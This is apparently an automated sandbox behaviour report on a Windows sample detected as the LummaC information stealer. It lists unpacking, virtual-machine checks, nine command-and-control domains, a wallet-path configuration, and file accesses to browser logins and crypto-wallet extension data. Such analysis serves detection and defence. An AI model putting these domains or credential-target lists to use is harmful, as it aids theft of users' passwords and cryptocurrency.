Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Unpacked PE file: 0.2.IzDjbVdHha.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Unpacked PE file: 0.2.IzDjbVdHha.exe.400000.0.unpack

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313C591 push 0000005Dh; retf	0_3_0313C5D4
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313C591 push 0000005Dh; retf	0_3_0313C5D4
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313B1ED push 0000005Dh; retf	0_3_0313B230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313B1ED push 0000005Dh; retf	0_3_0313B230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313C591 push 0000005Dh; retf	0_3_0313C5D4
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313C591 push 0000005Dh; retf	0_3_0313C5D4
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313B1ED push 0000005Dh; retf	0_3_0313B230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_0313B1ED push 0000005Dh; retf	0_3_0313B230
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_031454C8 push ss; retf	0_3_031454C9
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_3_00B772F4 push esi; retf	0_3_00B772F7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	0_2_0043D812
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00441B23 push esp; iretd	0_2_00441B24
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00443469 push ebp; iretd	0_2_0044346C
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0044366E push 9F00CD97h; ret	0_2_004436B1
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	0_2_0043AE3E
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_004477A5 push ebp; iretd	0_2_004477AA
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1B097 push eax; mov dword ptr [esp], 1D1E1F10h	0_2_00A1B0A5
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A1DA77 push eax; mov dword ptr [esp], 707F7E0Dh	0_2_00A1DA79
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 0_2_00A03A79 push esp; iretd	0_2_00A03A7C

Source: IzDjbVdHha.exe

Static PE information: section name: .text entropy: 7.370875737997095

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe TID: 416

Thread sleep time: -210000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000002.2561087270.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000002.2561087270.0000000000B44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2427943074.0000000003156000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: IzDjbVdHha.exe, 00000000.00000003.2428124529.000000000333B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

API call chain: ExitProcess graph end node

graph_0-22176

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_0043C1F0 LdrInitializeThunk,

0_2_0043C1F0

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Code function: 0_2_009E092B mov eax, dword ptr fs:[00000030h]

0_2_009E092B

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: IzDjbVdHha.exe	String found in binary or memory: rapeflowwj.lat
Source: IzDjbVdHha.exe	String found in binary or memory: crosshuaht.lat
Source: IzDjbVdHha.exe	String found in binary or memory: sustainskelet.lat
Source: IzDjbVdHha.exe	String found in binary or memory: aspecteirs.lat
Source: IzDjbVdHha.exe	String found in binary or memory: energyaffai.lat
Source: IzDjbVdHha.exe	String found in binary or memory: necklacebudi.lat
Source: IzDjbVdHha.exe	String found in binary or memory: discokeyus.lat
Source: IzDjbVdHha.exe	String found in binary or memory: grannyejh.lat
Source: IzDjbVdHha.exe	String found in binary or memory: driblbemris.lat

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: IzDjbVdHha.exe PID: 4344, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: IzDjbVdHha.exe, 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/El
Source: IzDjbVdHha.exe, 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/El
Source: IzDjbVdHha.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: IzDjbVdHha.exe	String found in binary or memory: p-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%ap
Source: IzDjbVdHha.exe, 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: }],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z
Source: IzDjbVdHha.exe	String found in binary or memory: Wallets/Exodus
Source: IzDjbVdHha.exe, 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: }],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z
Source: IzDjbVdHha.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: IzDjbVdHha.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
